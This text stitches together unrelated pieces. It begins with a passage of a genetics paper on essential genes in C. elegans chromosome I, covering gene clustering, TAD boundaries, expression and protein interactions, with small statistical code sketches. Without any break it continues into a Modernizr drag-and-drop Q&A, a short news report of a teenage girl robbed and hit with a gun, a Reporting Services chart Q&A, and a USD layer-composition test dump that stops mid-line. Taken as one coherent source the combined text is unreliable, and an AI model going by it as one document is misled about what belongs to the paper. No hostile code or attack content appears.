(GO:0050877) (*P-value* = 2.06*e*^*− 4*^), and multicellular organismal process (GO:0032501) (*P-value* = 1.52*e*^*− 4*^). If these processes are disrupted, *C. elegans* might show mutant phenotypes, which, however, are most likely not lethal. According to the PANTHER Protein Class analysis, essential genes in G3 are significantly enriched for nucleic acid binding (PC00171) (*P-value* = 3.50*e*^*− 128*^) and RNA binding protein (PC00031) (*P-value* = 9.97*e*^*− 113*^). All in all, the above analysis suggests that essential genes play key roles in enzymatic and nucleic acid binding activities during fundamental processes such as DNA replication, transcription, and translation.
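To illustrate the kind of overrepresentation test performed here, the sketch below applies a one-sided Fisher's exact test per annotation term with a Bonferroni correction. This is a generic sketch rather than the PANTHER implementation, and the gene identifiers, term names, and counts are invented for illustration.

```python
# Illustrative sketch of a GO-term overrepresentation test with Bonferroni
# correction; all inputs below are toy data, not the paper's gene sets.
from scipy.stats import fisher_exact

def go_enrichment(group_genes, background_genes, term_to_genes):
    """Return Bonferroni-corrected enrichment P-values per annotation term."""
    group = set(group_genes)
    background = set(background_genes)
    n_terms = len(term_to_genes)
    results = {}
    for term, annotated in term_to_genes.items():
        annotated = set(annotated) & background
        a = len(group & annotated)                 # group genes with the term
        b = len(group) - a                         # group genes without it
        c = len(annotated) - a                     # non-group genes with it
        d = len(background) - len(group) - c       # non-group genes without it
        _, p = fisher_exact([[a, b], [c, d]], alternative="greater")
        results[term] = min(p * n_terms, 1.0)      # Bonferroni correction
    return results

# Toy example with hypothetical gene identifiers.
background = [f"gene{i}" for i in range(200)]
essential = background[:40]
terms = {"GO:0003824 catalytic activity": background[:60],
         "GO:0007600 sensory perception": background[150:190]}
print(go_enrichment(essential, background, terms))
```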
Gene essentiality vs. gene cluster {#Sec8}
----------------------------------

It has been noted before that gene essentiality, evolutionary conservation, interaction networks, and gene expression are biological factors that can influence the structural features of proteins \[[@CR75]\]. Thus, we assessed the properties of essential genes across the four groups from three perspectives: gene clustering, gene expression, and protein connectivity. Hi-C experiments aim to capture DNA fragments that are close in spatial proximity, and genes that are close in space tend to share common functionality \[[@CR62]\]. We therefore used Hi-C data to determine whether essential genes exhibit higher or lower gene cluster densities. The contact frequencies between all genes were derived from the Hi-C interacting DNA fragments of wild-type (N2) mixed-stage embryos of *C. elegans* \[[@CR50]\]. Then, the average contact frequencies of genes in each group were calculated. Figure [2](#Fig2){ref-type="fig"} shows that genes from G2 tend to have more interaction partners than the other essential and non-essential groups. Genes from G2 tend to have more interaction partners than G1 (*P-value = 3.08e*^*− 2*^, Mann-Whitney U test), which means that the essential genes sequenced and analysed by our high-throughput method tend to have fewer interaction partners than the other essential genes in the region of chromosome I balanced by *sDp2*. Genes from G2 also have more interaction partners than G3 (*P-value = 1.62e*^*− 4*^, Wilcoxon rank-sum test), which might be due to the fact that G2 essential genes are enriched in cell cycle control, transcriptional regulation, and RNA processing \[[@CR27]\]. G2 genes also have more interaction partners than G4 (*P-value = 1.89e*^*− 2*^, Mann-Whitney U test), which indicates that essential genes in the region of chromosome I balanced by *sDp2* tend to engage in larger gene clusters than non-essential genes. However, G4 genes tend to have more interaction partners than G3 (*P-value = 6.10e*^*− 8*^, Wilcoxon rank-sum test), suggesting that non-essential genes in general tend to engage in larger gene clusters than essential genes.

Fig. 2 The cluster frequency of genes in each group in mixed-stage *C. elegans* embryos. Box plots show the gene interaction frequency for each group. The numbers on the right side of the yellow block represent the average interaction frequency of genes in each group. The *P*-values were obtained from the Mann-Whitney U test or the Wilcoxon rank-sum test after Levene's test.

Gene essentiality vs. TAD boundaries and gene expression {#Sec9}
--------------------------------------------------------

TAD boundaries are enriched in transcription start sites, active transcription, active chromatin marks, housekeeping genes, tRNA genes, short interspersed nuclear elements (SINEs), as well as binding sites for architectural proteins such as CTCF and cohesin \[[@CR55], [@CR76]--[@CR79]\]. To test whether essential genes tend to cluster in TAD boundaries, we examined the genes in each group and their association with TADs. Figure [3](#Fig3){ref-type="fig"} shows that G4 genes have a higher probability than G3 genes of lying in TAD boundaries (*P-value = 8.33e*^*− 3*^*, Fisher's exact test*), and essential genes appear to be located within TAD domains rather than at the boundaries. The fact that essential genes are not enriched in TAD boundaries suggests that essential genes may not be constitutively expressed like most housekeeping genes.
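The boundary-enrichment comparison can be sketched as a 2x2 contingency test: for two gene groups, count how many genes fall inside versus outside TAD boundary intervals and apply Fisher's exact test. The code below is a hypothetical illustration of that logic; the coordinates and counts are invented and do not come from the paper's data.

```python
# Hypothetical sketch of the TAD-boundary enrichment test described above.
from scipy.stats import fisher_exact

def in_boundary(gene_start, gene_end, boundaries):
    """True if the gene overlaps any (start, end) TAD-boundary interval."""
    return any(gene_start < b_end and gene_end > b_start
               for b_start, b_end in boundaries)

def boundary_enrichment(group_a_flags, group_b_flags):
    a_in = sum(group_a_flags); a_out = len(group_a_flags) - a_in
    b_in = sum(group_b_flags); b_out = len(group_b_flags) - b_in
    odds, p = fisher_exact([[a_in, a_out], [b_in, b_out]])
    return odds, p

# Toy example: group A (e.g., non-essential) vs. group B (e.g., essential).
boundaries = [(1_000_000, 1_050_000), (3_200_000, 3_260_000)]
group_a = [in_boundary(s, e, boundaries)
           for s, e in [(990_000, 1_010_000), (2_000_000, 2_005_000)]]
group_b = [in_boundary(s, e, boundaries)
           for s, e in [(5_000_000, 5_002_000), (6_000_000, 6_001_000)]]
print(boundary_enrichment(group_a, group_b))
```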
Consistent with this, when we examined the gene expression of essential genes using weighted correlation network analysis (WGCNA) across 23 developmental stages, we found that essential genes are expressed in specific time frames, with most of the essential genes showing strong expression in early development (Fig. [4](#Fig4){ref-type="fig"}).

Fig. 3 The percentage of genes from each essentiality group located in TAD boundaries. The four groups are labelled in black, red, green, and blue, respectively. Statistical differences were calculated for G1 vs. G2, G3, and G4 individually using Fisher's exact test (\* *P*-value \< 0.05, \*\* *P*-value \< 0.01, \*\*\* *P*-value \< 0.001).

Fig. 4 Gene expression. The figure shows the normalized transcript level (read number per coding length per million reads) for each gene across the developmental stages, including 18 embryonic stages, four larval stages (L1-L4), and young adult. To facilitate comparison, each gene's expression value at each stage was centered on that gene's average expression across stages. The heatmap represents normalized transcript level from high (pink) to low (sky blue). Distinct modules based on expression pattern are shown as colored modules. Yellow, Turquoise, Red, Purple, Blue, and Black: early-embryonic; Magenta: early- and mid-embryonic; Tan and Brown: mid-embryonic; Green: late-embryonic; Greenyellow: early-, mid-, and late-embryonic; Pink: larval.

Gene essentiality vs. protein connectivity {#Sec10}
------------------------------------------

We hypothesized that essential genes have more protein-protein interactions than non-essential genes because of their functional importance. Figure [5](#Fig5){ref-type="fig"} shows the distribution of the number of protein-protein interactions. Proteins from G4 tend to have fewer interaction partners than G3 (*P-value \< 2.20e*^*− 16*^, Wilcoxon rank-sum test), suggesting that essential genes tend to be protein interaction hubs. Similar results are seen for G1 (*P-value \< 2.20e*^*− 16*^, Wilcoxon rank-sum test) and G2 (*P-value \< 2.20e*^*− 16*^, Wilcoxon rank-sum test) in comparison with G4.

Fig. 5 The protein interaction frequency of genes in each group. The distribution of interaction numbers for each group against whole-genome protein interactions in *C. elegans* is shown as box plots of protein interaction frequency. The numbers on the right side of the yellow block represent the average interaction frequency of proteins in each group. The *P*-values were obtained from the Mann-Whitney U test or the Wilcoxon rank-sum test after Levene's test.

Discussion {#Sec11}
==========

Using genetic mapping, Illumina sequencing, and bioinformatics analyses, we successfully identified 44 essential genes among 130 lethal mutations in an approximately 7.3 Mb region of *C. elegans* Chromosome I (left). Of the 44 essential genes identified, 6 are newly predicted essential genes. As a result of our study, the total number of essential genes identified in the region covered by *sDp2* is now 82. High-throughput sequencing of balanced lethal mutations has proved more efficient and cost-effective than the traditional method, which involves Sanger sequencing of dozens of genes in a particular genetic mapping zone. Depending on the size of the mapped zone, the traditional method can take months or years to characterize one allele. Essential genes are important for the viability of an organism and can play a key role in novel drug development \[[@CR1], [@CR2]\].
With approximately 60% of the essential genes having human orthologs, *C. elegans* is also an important multi-cellular animal for the study of human disease \[[@CR27]\]. While knock-out collections, targeted knockout by the CRISPR/Cas9 system, and RNAi screens have steadily increased genomic coverage to genome scale \[[@CR13], [@CR31], [@CR80]--[@CR82]\], identification of essential genes in an intact multicellular organism is still limited by the recovery and maintenance of lethal mutations \[[@CR27], [@CR33]\]. Therefore, a resource such as the one described here for identifying and studying essential genes in model organisms is an important genetic resource for understanding the organization and function of essential genes, as well as a platform for in-depth functional studies. The functions of essential genes vary greatly and are spread across many pathways. GO term analysis and PANTHER Protein Class analysis indicate that essential genes play key roles in enzymatic activity, protein complexes, cellular processes, and nucleic acid binding during fundamental processes such as DNA replication, transcription, and translation. Non-essential genes, in contrast, are significantly enriched for the regulation of system processes, such as sensory perception, neurological system processes, and multicellular organismal processes. Previous reports have shown that essential genes in the left half of chromosome I in *C. elegans* function in cell cycle control, transcriptional regulation, and RNA processing \[[@CR33]\]. Our study increases the number of essential genes identified on Chromosome I and further strengthens the notion that DNA replication, transcription, and translation are enriched in this set. We found that non-essential genes form larger gene clusters than essential genes in general. Non-essential genes can experience gene duplication during evolution more often than essential genes, resulting in paralogs that cluster in the linear genome as well as in the 3D chromatin architecture \[[@CR83], [@CR84]\]. This may explain why non-essential genes form larger gene clusters in general. The observation that essential genes in the left half of Chromosome I form larger gene clusters than non-essential genes is intriguing. Functionally linked genes, including co-expressed genes, genes whose products interact, and genes in the same pathway, cluster together in physical proximity in *Escherichia coli*, *C. elegans*, and humans \[[@CR62], [@CR63], [@CR85]\]. From the gene expression analysis, we observed that the majority of the essential genes are expressed early in development. We hypothesize that there is a common mode of expression regulation facilitated by the 3D chromatin structure. This notion is consistent with our observation that essential genes tend to be located within TAD structures rather than at TAD boundaries. Studies in *Caulobacter crescentus* show that highly expressed genes are enriched in the boundaries of chromosomal interaction domains (CIDs) \[[@CR41]\]. In mammalian cells, TAD boundaries are enriched in transcription start sites, active transcription, active chromatin marks, housekeeping genes, tRNA genes, and short interspersed nuclear elements (SINEs) \[[@CR55]\]. The observation that essential genes are expressed at very specific developmental stages suggests that their expression is tightly regulated rather than constitutive. By residing within a TAD, a gene's expression can be controlled by either facilitating or preventing loop interactions \[[@CR60]\]. Proteins do not function alone.
We found that essential genes act as hubs in the protein-protein interaction network, with a higher number of protein interactions than non-essential genes. This is consistent with studies in yeast showing that the most highly connected genes in the cell are the most important ones for an organism's viability \[[@CR86]\].

Conclusions {#Sec12}
===========

In the present work, we comprehensively analyzed genomic mutations in 130 Chromosome I mutants of *C. elegans* with a combination of targeted and forward mutational approaches \[[@CR27]\] and successfully identified 44 essential genes with high confidence, of which 6 are new essential genes never before characterized by mutant alleles. This is also the first time that all essential genes identified to date have been analyzed together with 3D chromosome conformation data, and we found that essential genes are preferentially located within TAD structures rather than at TAD boundaries. The data presented here provide a genetic resource for further functional studies of essential genes and for a better understanding of the minimal set of genes and pathways required for survival.

Methods {#Sec13}
=======

*C. elegans* strains {#Sec14}
--------------------

The strains used are provided in Additional file [1](#MOESM1){ref-type="media"}. The strains were generated by mutagenizing KR235 \[*dpy-5 (e61), +, unc-13 (e450)*/*dpy-5 (e61), unc-15 (e73), +*; *sDp2*\] grown on nematode growth medium streaked with *E. coli* OP50 \[[@CR27], [@CR87]\]. The maintenance of each strain and the isolation of its genomic DNA were performed as previously described \[[@CR27]\]. Library preparation and sequencing were performed by the BC Cancer Agency Genome Sciences Centre.

Mutation identification procedure {#Sec15}
---------------------------------

The FASTQ reads were aligned to the *C. elegans* reference genome (WS246) using BWA \[[@CR88]\]. GATK \[[@CR89]\] and SAMtools \[[@CR90]\] were used to call variants \[[@CR27]\]. The candidate essential genes on Chromosome I are rescued by a third, wild-type allele on *sDp2*, and thus we focused on finding mutations with variant frequencies around 66%. In our sequencing data, we removed strains without the expected *dpy-5 (e61)I* and *unc-13 (e450)I* mutations and strains without sufficient sequencing coverage from further analysis. Single nucleotide variations (SNVs) exhibiting a variant ratio between 40 and 90% were selected from the sequencing data. Two filtration steps were then performed. First, some variations could come from the starting strain KR235 that was used for mutagenesis; in order to filter out the background variations between the starting strain and the *C. elegans* reference genome, we excluded all variations identified in KR235 \[[@CR27], [@CR74]\]. Second, the variations were required to be supported by at least 8 reads, in both forward and reverse directions. After these two filtration steps, the remaining SNVs were subjected to subsequent essential gene identification.
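As a minimal sketch of the SNV filtering just described, the function below keeps a variant only if its allele ratio falls in the 40-90% window, it is supported by at least 8 reads with support on both strands, and it is not a background variant of the starting strain. The record layout, function names, and example values are assumptions for illustration, not the authors' pipeline.

```python
# Illustrative sketch of the SNV filtering described above (toy data only).
def keep_snv(snv, background_positions,
             ratio_window=(0.40, 0.90), min_reads=8):
    """Apply the filters: variant-ratio window, read support on both strands,
    and exclusion of background variants from the starting strain."""
    alt = snv["fwd_alt"] + snv["rev_alt"]
    total = alt + snv["fwd_ref"] + snv["rev_ref"]
    ratio = alt / total if total else 0.0
    return (ratio_window[0] <= ratio <= ratio_window[1]
            and alt >= min_reads
            and snv["fwd_alt"] > 0 and snv["rev_alt"] > 0
            and (snv["chrom"], snv["pos"]) not in background_positions)

background = {("I", 1_234_567)}   # hypothetical KR235 background variant
candidates = [
    {"chrom": "I", "pos": 2_000_100, "fwd_alt": 7, "rev_alt": 6, "fwd_ref": 4, "rev_ref": 3},
    {"chrom": "I", "pos": 1_234_567, "fwd_alt": 9, "rev_alt": 8, "fwd_ref": 5, "rev_ref": 4},
]
kept = [s for s in candidates if keep_snv(s, background)]
print(len(kept))  # 1 (the background variant is removed)
```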
The molecular identification of essential genes on Chromosome I (left) is based on three lines of evidence. First, variations in each strain were screened based on previous genetic mapping data \[[@CR80], [@CR91], [@CR92]\]. Second, lethal phenotypes supported by RNAi or existing alleles in WormBase ([www.wormbase.org](http://www.wormbase.org/)) increase the credibility of the mutations. Last, mutations that usually lead to harmful phenotypes, such as splicing or nonsense mutations, should be absent from essential genes in the Million Mutation Project (MMP) database \[[@CR30]\]; thus, it is less likely that the candidate essential genes contain lethal mutations in the MMP database. With the aforementioned information, a total of 44 sequenced essential genes were identified with high confidence in the Chromosome I balanced regions, 9 of which were found in our previous study \[[@CR27]\]; these are summarized in Table [1](#Tab1){ref-type="table"} and Additional file [2](#MOESM2){ref-type="media"}.

Essential genes functional analysis {#Sec16}
-----------------------------------

Pfam analysis: The domain families present in each protein were searched with InterProScan \[[@CR93]\] using the Pfam database \[[@CR94]\]. Gene Ontology (GO) analysis: GO annotation was done using Blast2GO \[[@CR95]\]. This part of the analysis was also done with the PANTHER classification system \[[@CR96]\] from the website <http://pantherdb.org/>. GO annotations (Cellular Component, Biological Process, and Molecular Function) and PANTHER Protein Class (grouping terms used to classify protein families and subfamilies, which are sometimes but not always related to molecular function \[[@CR97]\]) were examined individually, using the Bonferroni correction for multiple testing. Gene cluster: The Hi-C and TAD data of wild-type (N2) mixed-stage embryos of *C. elegans* were obtained from Crane et al. \[[@CR50]\]. The data were binned into 50 kb non-overlapping genomic intervals, which we term loci. The interaction data between loci were normalized using standard ICE methods \[[@CR98]\]. The significance of the interaction between a pair of loci was calculated using *Fit-Hi-C* \[[@CR99]\] with a minimum of 15 contact counts and *P* \< 0.01. When a locus showed significant interactions with 2 or more other loci, all interacting loci were grouped together. The genes within a group of interacting loci were considered interacting genes, and the interaction frequency of each gene was counted. The average interaction frequencies of genes in each group were then compared. The *P*-values were obtained from the Mann-Whitney U test or the Wilcoxon rank-sum test after Levene's test. Protein connectivity: The protein interaction data for *C. elegans* were obtained from BioGRID \[[@CR100]--[@CR102]\]. There are 3911 unique genes involved in 8488 non-redundant protein-protein interactions. We counted the number of protein-protein interactions of each gene, and the average protein-protein interaction frequencies of genes in each group were compared. The *P*-values were obtained from the Mann-Whitney U test or the Wilcoxon rank-sum test after Levene's test. Gene expression: The gene expression data for *C. elegans* were obtained from the *GExplore* (version 1.4) database \[[@CR103]\], which contains developmental stage data originating from the NHGRI modENCODE project \[[@CR104], [@CR105]\]. The expression profile clustering was done using weighted correlation network analysis (WGCNA), which detects clusters (modules) of highly correlated, co-expressed genes \[[@CR106]\].
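To make the gene-cluster counting and group comparison concrete, the sketch below groups loci that share significant Hi-C interactions, counts how many interacting genes each gene has, and then compares two gene groups with Levene's test followed by a Mann-Whitney U / Wilcoxon rank-sum test; the same comparison logic applies to the BioGRID protein-connectivity counts. This is a hypothetical illustration under simplified assumptions, not the authors' code, and all inputs are invented.

```python
# Hypothetical sketch of the gene-cluster counting and group comparison.
from collections import defaultdict
from scipy.stats import levene, mannwhitneyu

def interaction_frequency(significant_pairs, locus_to_genes):
    """significant_pairs: iterable of (locus_a, locus_b) passing Fit-Hi-C cutoffs."""
    neighbours = defaultdict(set)
    for a, b in significant_pairs:
        neighbours[a].add(b)
        neighbours[b].add(a)
    freq = defaultdict(int)
    for locus, partners in neighbours.items():
        if len(partners) < 2:            # group loci interacting with >= 2 others
            continue
        group_loci = {locus} | partners
        group_genes = {g for l in group_loci for g in locus_to_genes.get(l, [])}
        for gene in locus_to_genes.get(locus, []):
            freq[gene] = len(group_genes) - 1
    return dict(freq)

def compare_groups(values_a, values_b):
    _, p_levene = levene(values_a, values_b)     # check the variance assumption
    _, p = mannwhitneyu(values_a, values_b, alternative="two-sided")
    return p_levene, p

# Toy data: three 50 kb loci, two of which interact significantly with locus 0.
pairs = [(0, 1), (0, 2)]
locus_genes = {0: ["geneA"], 1: ["geneB"], 2: ["geneC"]}
print(interaction_frequency(pairs, locus_genes))   # {'geneA': 2}
print(compare_groups([2, 3, 1, 4], [0, 1, 0, 2]))
```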
Additional files {#Sec17}
================

Additional file 1: List of alleles studied. The alleles used for WGS are listed in the 2nd column. (XLS 44 kb)

Additional file 2: Identification of essential genes, including information about the allele name, the strain name, the genetic mapping zones \[[@CR33]\], location, predicted gene, allele mutation, RNAi support, allele support, and MMP support of the essential genes. An asterisk (\*) signifies a stop codon. (XLS 43 kb)

Additional file 3: The KEGG annotation and the GO annotation. The KEGG annotations of genes are listed in the 3rd column. The GO annotations of genes are listed in the 4th column. (XLS 57 kb)

EMS: ethyl methane sulfonate; GO: Gene Ontology; KEGG: Kyoto Encyclopedia of Genes and Genomes; KOG: EuKaryotic Orthologous Groups; MMP: Million Mutation Project; SNVs: single nucleotide variations; WGCNA: weighted correlation network analysis; WGS: whole genome sequencing

We thank members of the Baillie lab and Rose lab for helpful comments and technical support. We thank the BC Cancer Agency Genome Sciences Centre for performing the whole genome sequencing.

Funding {#FPar1}
=======

This work is funded in part by Canadian Institutes of Health Research Fanconi Anemia Fellowship 289473 and Natural Sciences and Engineering Research Council grant RGPIN-2015-04266.

Availability of data and materials {#FPar2}
==================================

The sequencing data have been deposited in the NCBI Sequence Read Archive (accession numbers SRR6739866-SRR6739996).

DLB, AMR, and JSC conceived the study. JSC prepared genomic DNA for WGS. JSC and SY analyzed the WGS data. SY conducted essential gene identification, functional annotation analysis, gene cluster analysis, and protein connectivity analysis. CZ and DZ performed the gene expression analysis. FZ performed the gene essentiality vs. TAD boundaries analysis. SY, CZ, DZ, and JSC wrote the manuscript. All authors read and approved the final manuscript.

Ethics approval and consent to participate {#FPar3}
==========================================

Not applicable.

Consent for publication {#FPar4}
=======================

Not applicable.

Competing interests {#FPar5}
===================

The authors declare that they have no competing interests.

Publisher's Note {#FPar6}
================

Springer Nature remains neutral with regard to jurisdictional claims in published maps and institutional affiliations.
null
minipile
NaturalLanguage
mit
null
17-year-old girl hit with gun, robbed A 17-year-old girl was struck on the forehead with the butt of a gun Thursday during a robbery in the Crocker Amazon neighborhood. The suspect, also a teenager, grabbed cash from the girl’s hands in the 1500 block of Geneva Avenue around 10:30 p.m., police said. The woman was hit after she tried to wrestle the money back, they said.
null
minipile
NaturalLanguage
mit
null
Q: Detecting drag and drop with Modernizr (not file drag and drop) I've spent a fair while looking for the answer to this question and either found answers that are out of date or answers that relate to file drag and drop. I just want to check if a user's browser supports HTML5 drag and drop. At the moment the line... if (!Modernizr.draganddrop) { // non-HTML5 alternative drag and drop code here } ...returns true for any IE version I emulate. Why does Modernizr think that IE doesn't support drag and drop at all? I read that IE9 onward does... Should I be checking the browser version instead? Any help, much appreciated. A: Just use javascript rather than Modernizr: function dragAndDropSupported () { return 'draggable' in document.createElement('span'); } Check to see if dragAndDropSupported() === true
null
minipile
NaturalLanguage
mit
null
Q: Delete blank space before and after axis column and complete the color in last area I have a chart in my report that I created with ReportingServices. The report works, but I want to change two properties and I don't know where to find them. The chart is this: As you can see, there is a blank space before "Mon" and after "Sun"; I don't want that blank space before and after the Day. Second, I want to extend the Red Area to the end of the chart. Is this possible??? Regards I tried to change these properties: ChartArea properties, then I selected Custom Position, then I set the Left property = 0, but the result is the same A: Right-click on the axis -> Horizontal Axis Properties -> when the property screen appears, set Side Margins to Disabled.
null
minipile
NaturalLanguage
mit
null
Loading @TimeCodesPerSecond/root.sdf@ ------------------------------------------------------------------------ Layer Stack: root.sdf s.sdf ss.sdf ss_48tcps.sdf ss_24tcps_12fps.sdf ss_12fps.sdf s_48tcps.sdf ss.sdf ss_48tcps.sdf ss_24tcps_12fps.sdf ss_12fps.sdf s_24tcps_12fps.sdf ss.sdf ss_48tcps.sdf ss_24tcps_12fps.sdf ss_12fps.sdf s_12fps.sdf ss.sdf ss_48tcps.sdf ss_24tcps_12fps.sdf ss_12fps.sdf ------------------------------------------------------------------------ Results for composing </SS4> Prim Stack: ss_12fps.sdf /SS4 ss_12fps.sdf /SS4 ss_12fps.sdf /SS4 ss_12fps.sdf /SS4 ref.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref_48tcps.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref_24tcps_12fps.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref_12fps.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref_48tcps.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref_24tcps_12fps.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref_12fps.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref_48tcps.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref_24tcps_12fps.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref_12fps.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref Time Offsets: root.sdf /SS4 root (offset=0.00, scale=1.00) s.sdf sublayer (offset=10.00, scale=2.00) ss.sdf sublayer (offset=30.00, scale=4.00) ss_48tcps.sdf sublayer (offset=30.00, scale=2.00) ss_24tcps_12fps.sdf sublayer (offset=30.00, scale=4.00) ss_12fps.sdf sublayer (offset=30.00, scale=8.00) s_48tcps.sdf sublayer (offset=10.00, scale=1.00) ss.sdf sublayer (offset=20.00, scale=4.00) ss_48tcps.sdf sublayer (offset=20.00, scale=2.00) ss_24tcps_12fps.sdf sublayer (offset=20.00, scale=4.00) ss_12fps.sdf sublayer (offset=20.00, scale=8.00) s_24tcps_12fps.sdf sublayer (offset=10.00, scale=2.00) ss.sdf sublayer (offset=30.00, scale=4.00) ss_48tcps.sdf sublayer (offset=30.00, scale=2.00) ss_24tcps_12fps.sdf sublayer (offset=30.00, scale=4.00) ss_12fps.sdf sublayer (offset=30.00, scale=8.00) s_12fps.sdf sublayer (offset=10.00, scale=4.00) ss.sdf sublayer (offset=50.00, scale=4.00) ss_48tcps.sdf sublayer (offset=50.00, scale=2.00) ss_24tcps_12fps.sdf sublayer (offset=50.00, scale=4.00) ss_12fps.sdf sublayer (offset=50.00, scale=8.00) ref.sdf /Ref reference (offset=110.00, scale=8.00) ref_s_48tcps.sdf sublayer (offset=0.00, scale=0.50) ref_s_12fps.sdf sublayer (offset=0.00, scale=2.00) ref_48tcps.sdf /Ref reference (offset=110.00, scale=4.00) ref_s.sdf sublayer (offset=0.00, scale=2.00) ref_s_24tcps_12fps.sdf sublayer (offset=0.00, scale=2.00) ref_s_12fps.sdf sublayer (offset=0.00, scale=4.00) ref_24tcps_12fps.sdf /Ref reference (offset=110.00, scale=8.00) ref_s_48tcps.sdf sublayer (offset=0.00, scale=0.50) ref_s_12fps.sdf sublayer (offset=0.00, scale=2.00) ref_12fps.sdf /Ref reference (offset=110.00, scale=16.00) ref_s.sdf sublayer (offset=0.00, scale=0.50) ref_s_48tcps.sdf 
sublayer (offset=0.00, scale=0.25) ref_s_24tcps_12fps.sdf sublayer (offset=0.00, scale=0.50) ref.sdf /Ref reference (offset=100.00, scale=8.00) ref_s_48tcps.sdf sublayer (offset=0.00, scale=0.50) ref_s_12fps.sdf sublayer (offset=0.00, scale=2.00) ref_48tcps.sdf /Ref reference (offset=100.00, scale=4.00) ref_s.sdf sublayer (offset=0.00, scale=2.00) ref_s_24tcps_12fps.sdf sublayer (offset=0.00, scale=2.00) ref_s_12fps.sdf sublayer (offset=0.00, scale=4.00) ref_24tcps_12fps.sdf /Ref reference (offset=100.00, scale=8.00) ref_s_48tcps.sdf sublayer (offset=0.00, scale=0.50) ref_s_12fps.sdf sublayer (offset=0.00, scale=2.00) ref_12fps.sdf /Ref reference (offset=100.00, scale=16.00) ref_s.sdf sublayer (offset=0.00, scale=0.50) ref_s_48tcps.sdf sublayer (offset=0.00, scale=0.25) ref_s_24tcps_12fps.sdf sublayer (offset=0.00, scale=0.50) ref.sdf /Ref reference (offset=130.00, scale=8.00) ref_s_48tcps.sdf sublayer (offset=0.00, scale=0.50) ref_s_12fps.sdf sublayer (offset=0.00, scale=2.00) ref_48tcps.sdf /Ref reference (offset=130.00, scale=4.00) ref_s.sdf sublayer (offset=0.00, scale=2.00) ref_s_24tcps_12fps.sdf sublayer (offset=0.00, scale=2.00) ref_s_12fps.sdf sublayer (offset=0.00, scale=4.00) ref_24tcps_12fps.sdf /Ref reference (offset=130.00, scale=8.00) ref_s_48tcps.sdf sublayer (offset=0.00, scale=0.50) ref_s_12fps.sdf sublayer (offset=0.00, scale=2.00) ref_12fps.sdf /Ref reference (offset=130.00, scale=16.00) ref_s.sdf sublayer (offset=0.00, scale=0.50) ref_s_48tcps.sdf sublayer (offset=0.00, scale=0.25) ref_s_24tcps_12fps.sdf sublayer (offset=0.00, scale=0.50) ------------------------------------------------------------------------ Results for composing </SS3> Prim Stack: ss_24tcps_12fps.sdf /SS3 ss_24tcps_12fps.sdf /SS3 ss_24tcps_12fps.sdf /SS3 ss_24tcps_12fps.sdf /SS3 ref.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref_48tcps.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref_24tcps_12fps.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref_12fps.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref_48tcps.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref_24tcps_12fps.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref_12fps.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref_48tcps.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref_24tcps_12fps.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref_12fps.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref Time Offsets: root.sdf /SS3 root (offset=0.00, scale=1.00) s.sdf sublayer (offset=10.00, scale=2.00) ss.sdf sublayer (offset=30.00, scale=4.00) ss_48tcps.sdf sublayer (offset=30.00, scale=2.00) ss_24tcps_12fps.sdf sublayer (offset=30.00, scale=4.00) ss_12fps.sdf sublayer (offset=30.00, scale=8.00) s_48tcps.sdf sublayer (offset=10.00, scale=1.00) ss.sdf sublayer (offset=20.00, 